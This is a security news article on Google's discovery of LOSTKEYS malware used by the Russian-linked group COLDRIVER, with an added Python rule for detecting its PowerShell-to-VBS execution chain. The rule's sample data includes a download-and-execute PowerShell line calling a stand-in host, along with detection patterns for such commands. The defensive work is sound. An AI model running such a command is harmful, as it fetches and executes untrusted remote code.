Google Discovers New LOSTKEYS Malware Linked to Russian Cyberespionage Group COLDRIVER

In recent cybersecurity developments, Google’s Threat Intelligence Group (GTIG) has uncovered a new malware strain named LOSTKEYS. This malware is being used by the Russian-linked Advanced Persistent Threat (APT) group known as COLDRIVER. With a history of targeting high-profile individuals and organizations, COLDRIVER’s latest campaign is marked by sophisticated attack methods and a focused aim at stealing critical data, including files and system information. This article delves into the key findings of the Google GTIG report, examining how the malware operates, its victims, and the evolving tactics of COLDRIVER.

Analysis of

Google’s GTIG has discovered that COLDRIVER, also known by several other aliases like Seaborgium, Callisto, and Star Blizzard, has been employing the LOSTKEYS malware to further its cyberespionage operations. This group has been active since at least 2015, primarily targeting NATO countries, as well as regions like the Baltics, Nordics, Eastern Europe, and notably Ukraine. Their past campaigns have included phishing, credential theft, and other forms of data exfiltration aimed at government officials, military personnel, journalists, and think tanks.

In early 2025, COLDRIVER launched a targeted campaign using the LOSTKEYS malware to infiltrate victims’ systems. The malware is delivered through a multi-stage attack that begins with a fake CAPTCHA page, which the attacker uses to trick the victim into running a malicious PowerShell script. Once run, the script follows a specific chain of execution in which payloads are fetched from remote servers. These payloads, which include VBS (Visual Basic Script) files, steal sensitive data, such as files with specific extensions, and send system information to the attacker.

The malware is highly selective, using several techniques to evade detection and to run only on its intended targets. For example, it checks the device’s display resolution and halts execution if certain criteria are not met. In addition, the payloads used in these attacks are uniquely crafted for each victim, giving the attacker a tailored and efficient delivery method.

The stolen data includes email credentials, contact lists, and files, which are essential for COLDRIVER’s intelligence-gathering operations. Although the primary goal of the group is espionage for Russian interests, the stolen data is sometimes used in hack-and-leak operations to publicly embarrass or discredit the targets.

What Undercode Says:

The ongoing use of sophisticated malware like LOSTKEYS is a clear indicator of the escalating cyberwarfare tactics employed by Russian-linked groups. COLDRIVER’s method of delivering malware via deceptive PowerShell scripts is particularly troubling due to its stealthy nature. The multi-stage execution chain makes it difficult for traditional security tools to detect and block the attack before significant damage is done.

This selective attack methodology suggests a high level of resource allocation, with malware being deployed only against targets deemed valuable to Russian interests. Unlike other more indiscriminate cyberattacks, COLDRIVER’s actions point to a deliberate strategy of collecting strategic intelligence. The targeted nature of the attack implies that the group has a deep understanding of its victims’ profiles, ranging from government officials to journalists, and is using this data to further their geopolitical objectives.

The use of PowerShell as the attack vector is also notable. PowerShell-based attacks have become a common feature of advanced cyber espionage campaigns because PowerShell is a legitimate, built-in tool that can be abused to bypass security defenses. Because a malicious script runs inside a trusted system process, it can operate under the radar, making it challenging for security teams to identify the activity early.
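The execution chain described above (PowerShell launched from a lure, a staged download, then a VBS payload run from a user-writable directory) leaves a recognisable footprint in process-creation telemetry even when the scripts themselves are unique per victim. The following added example, which is not from the Google GTIG report or from any vendor tool, shows a minimal hunting rule over process-creation events. The log format (`timestamp|pid|ppid|image|commandline`), the sample events and the indicator regexes are all constructed for illustration; no indicators from the actual campaign are included.

```python
"""Hunt for a PowerShell -> script-host download chain in process-creation logs.

Constructed example for illustration only. The pipe-delimited event format,
the sample events and the indicator patterns are assumptions, not telemetry
or indicators from the LOSTKEYS campaign.
"""
import re
from dataclasses import dataclass

# Command-line traits that, in combination, are rarely seen in legitimate
# administrative PowerShell use. One hit alone is noisy; require several.
POWERSHELL_INDICATORS = {
    "hidden_window": re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    "encoded_command": re.compile(r"-(?:e|enc|encodedcommand)\b", re.I),
    "execution_policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "download_or_eval": re.compile(
        r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|invoke-expression|iex)\b",
        re.I,
    ),
}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"\\(?:temp|appdata|downloads|public)\\", re.I)


@dataclass
class Event:
    ts: str
    pid: int
    ppid: int
    image: str
    cmdline: str


def parse_event(line: str) -> Event:
    # maxsplit=4 keeps any '|' characters inside the command line intact.
    ts, pid, ppid, image, cmdline = line.split("|", 4)
    return Event(ts, int(pid), int(ppid), image, cmdline)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def powershell_hits(ev: Event) -> list:
    """Names of the indicator patterns present on a PowerShell command line."""
    if basename(ev.image) not in POWERSHELL_IMAGES:
        return []
    return [name for name, rx in POWERSHELL_INDICATORS.items() if rx.search(ev.cmdline)]


def detect(lines, min_indicators: int = 2) -> list:
    """Return alerts for suspicious PowerShell and for script hosts it spawned."""
    events = [parse_event(line) for line in lines]
    by_pid = {ev.pid: ev for ev in events}
    alerts = []
    for ev in events:
        hits = powershell_hits(ev)
        if len(hits) >= min_indicators:
            alerts.append({"rule": "suspicious_powershell", "pid": ev.pid, "detail": hits})
        # Stage two: wscript/cscript running a .vbs from a user-writable path,
        # with PowerShell as the parent process.
        if basename(ev.image) in SCRIPT_HOSTS and re.search(r"\.vbs\b", ev.cmdline, re.I):
            parent = by_pid.get(ev.ppid)
            if (parent is not None
                    and basename(parent.image) in POWERSHELL_IMAGES
                    and USER_WRITABLE.search(ev.cmdline)):
                alerts.append({"rule": "powershell_spawned_script_host",
                               "pid": ev.pid, "detail": {"parent_pid": parent.pid}})
    return alerts


# Constructed sample events: one lure-style chain plus two benign lookalikes.
SAMPLE_EVENTS = [
    r"2025-01-15T10:02:11|4120|1800|C:\Windows\explorer.exe|explorer.exe",
    r'2025-01-15T10:02:40|5210|4120|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|'
    r'powershell.exe -w hidden -ep bypass -c "iwr http://stage.example.invalid/s1 | iex"',
    r"2025-01-15T10:02:43|5302|5210|C:\Windows\System32\wscript.exe|"
    r"wscript.exe C:\Users\alice\AppData\Local\Temp\stage2.vbs",
    r"2025-01-15T10:05:00|6001|4120|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1",
    r"2025-01-15T10:06:00|6100|4120|C:\Windows\System32\cscript.exe|"
    r"cscript.exe C:\Windows\System32\slmgr.vbs /dlv",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The benign events (a scheduled inventory script and the built-in `slmgr.vbs`) produce no alerts, while the lure chain produces two: the hidden, policy-bypassing, downloading PowerShell process, and the script host it spawned from a temp directory. In production the same logic would read Sysmon Event ID 1 or EDR process-creation records, and the indicator list would be tuned against the environment’s own PowerShell baseline.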

Additionally, the fact that two separate sets of malware samples have been discovered—one from January 2025 and one from December 2023—raises the question of whether COLDRIVER has been experimenting with different methods of malware deployment. The December 2023 samples, which posed as Maltego software, could signify the group’s adaptability and willingness to repurpose tools from other operations or developers, suggesting that it continually refines its tactics to stay ahead of cybersecurity defenses.

From an intelligence perspective, this operation is a critical reminder of how cyberespionage is evolving. State-backed APT groups are increasingly using advanced techniques and malware tailored to exploit specific vulnerabilities in their targets. The stolen credentials, emails, and contacts are not just incidental—they form a core part of the broader strategy of influencing political landscapes and gathering sensitive information to fuel further operations.

Furthermore, the close ties between malware operations like LOSTKEYS and the broader geopolitical climate cannot be ignored. This attack is not only about stealing data; it’s about leveraging that data for broader strategic gains. For example, the inclusion of Ukrainian-linked individuals as targets aligns with ongoing tensions and the geopolitical situation in Eastern Europe, particularly in relation to the Russian-Ukrainian conflict.

Fact Checker Results:

  1. COLDRIVER has been active since at least 2015, with a long history of cyberespionage targeting government entities and high-profile individuals.
  2. LOSTKEYS malware has been used in highly targeted campaigns, with a clear focus on stealing files and system information from selected individuals.
  3. The technique of using deceptive PowerShell scripts and staged payloads is consistent with other known cyberespionage campaigns attributed to Russian state-backed groups.

Prediction:

Looking ahead, the tactics employed by COLDRIVER are likely to evolve further. Given the increasing sophistication of the group’s malware, future attacks could feature even more personalized and evasive methods. As international tensions rise, especially between Russia and Western powers, we can expect cyberattacks to play an increasingly critical role in geopolitical strategy. The use of malware like LOSTKEYS could become more widespread, with other APT groups adopting similar tactics. Security teams and organizations must remain vigilant, continually updating their defenses and monitoring for these highly targeted, evolving threats.

References:

Reported By: securityaffairs.com